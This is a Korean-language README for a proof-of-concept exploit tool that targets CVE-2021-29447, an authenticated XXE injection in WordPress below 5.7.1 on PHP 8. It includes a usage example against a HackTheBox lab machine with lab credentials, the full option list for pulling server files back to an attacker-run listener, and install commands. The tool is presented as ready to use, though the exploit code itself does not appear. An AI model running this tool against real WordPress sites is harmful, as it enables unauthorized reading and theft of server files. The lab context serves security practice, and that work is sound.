
CVE-2021-29447 - 인증된 XXE 주입 - WordPress < 5.7.1 & PHP > 8
WordPress 5.6-5.7 (PHP 8+) 인증 XXE 주입을 악용하기 위한 PoC. 이 CVE에 대한 자세한 내용은 여기에서 확인하세요.
HackTheBox의 MetaTwo 머신(XXE 주입에 취약한 미디어 라이브러리를 가진 WordPress 웹사이트)에 대한 사용 예시.
python lfi.py -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w file_wordlist
usage: lfi.py [-h] -u USERNAME -p PASSWORD -t TARGET -lh LHOST [-lp LPORT] [-w WORDLIST] [-i] [-v] [-s]
[filenames ...]
positional arguments:
filenames 가져올 파일 이름
options:
-h, --help 도움말 메시지를 표시하고 종료
-u USERNAME, --username USERNAME
인증된 업로드에 사용할 사용자 이름
-p PASSWORD, --password PASSWORD
인증된 업로드에 사용할 비밀번호
-t TARGET, --target TARGET
대상 원격 호스트 (예: "metapress.htb")
-lh LHOST, --host LHOST
서버가 바인딩된 호스트 이름 (기본값 "")
-lp LPORT, --port LPORT
수신 포트 (기본값 "8080")
-w WORDLIST, --wordlist WORDLIST
가져올 파일 이름들의 단어 목록
-i, --interactive 대화형 모드로 실행
-v, --verbose 상세 모드 활성화
-s, --skip PHP 서버 실행 건너뛰기 (반드시 이미 실행 중인지 확인하세요!)
php가 설치되어 있는지 확인하세요.
git clone https://github.com/viardant/CVE-2021-29447
cd CVE-2021-29447
pip install -r requirements.txt